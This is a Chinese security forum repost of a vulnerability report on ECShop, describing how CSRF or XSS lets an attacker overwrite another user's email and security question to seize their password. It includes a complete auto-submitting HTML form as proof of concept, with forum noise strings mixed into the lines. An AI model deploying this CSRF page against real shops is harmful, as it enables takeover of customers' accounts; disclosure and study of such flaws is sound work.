找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1822|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
简要描述:
% _; X8 T0 I% n8 M, q& Zecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
0 I' Q. n6 S% \7 \+ C- X
; j& B* r5 q* X# q  ]Demo For:http://www.wooyun.org/bug.php?action=view&id=395
- g2 z, I7 n) X/ Z% j$ u6 r3 a7 O: C% D  o# {
详细说明:
8 B/ x/ w( V* b/ f- j9 o利用csrf和xss可以突破官方所说的“障碍”; a2 B/ D# I  R6 d/ j
xss版本已经有人说明. O& ?: L$ r. G' t. H
这里给出csrf版本
# g4 O& J$ C+ [) I1 R# J; e
! b& K$ U7 {1 n  R漏洞证明:
5 g: ~+ p- R6 H+ O. t<html>
: y! \3 l! A) q% [<body>
3 y  j& R% H: d5 t( g! k% Q<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' H% Y) `" x2 w3 M4 N3 U<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">( j/ ?& K9 Q8 @: _( v4 Y6 ~; j+ q
<INPUT TYPE="text" NAME="act" value="act_edit_profile">" s3 H$ r+ s! W1 m# f2 ]8 c0 |
<INPUT TYPE="text" NAME="sel_question" value="ecshop">4 y7 T# k9 x1 c% h( H. v
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">& T: F, H9 d! ?3 t* m2 b
</body>/ l7 H% Y  k* S# F# u% K
<script>
* `. m) x+ s2 l$ A3 pdocument.forms[0].submit();
* e2 r* O  C( H' l</script>
1 ^. N  U+ p0 L7 `- I' s0 Z' ?</html>$ L+ d+ S& U5 D3 w! [% l
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
0 `, c' z9 [, k$ M! L" l% v. N. }# c4 w: X2 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表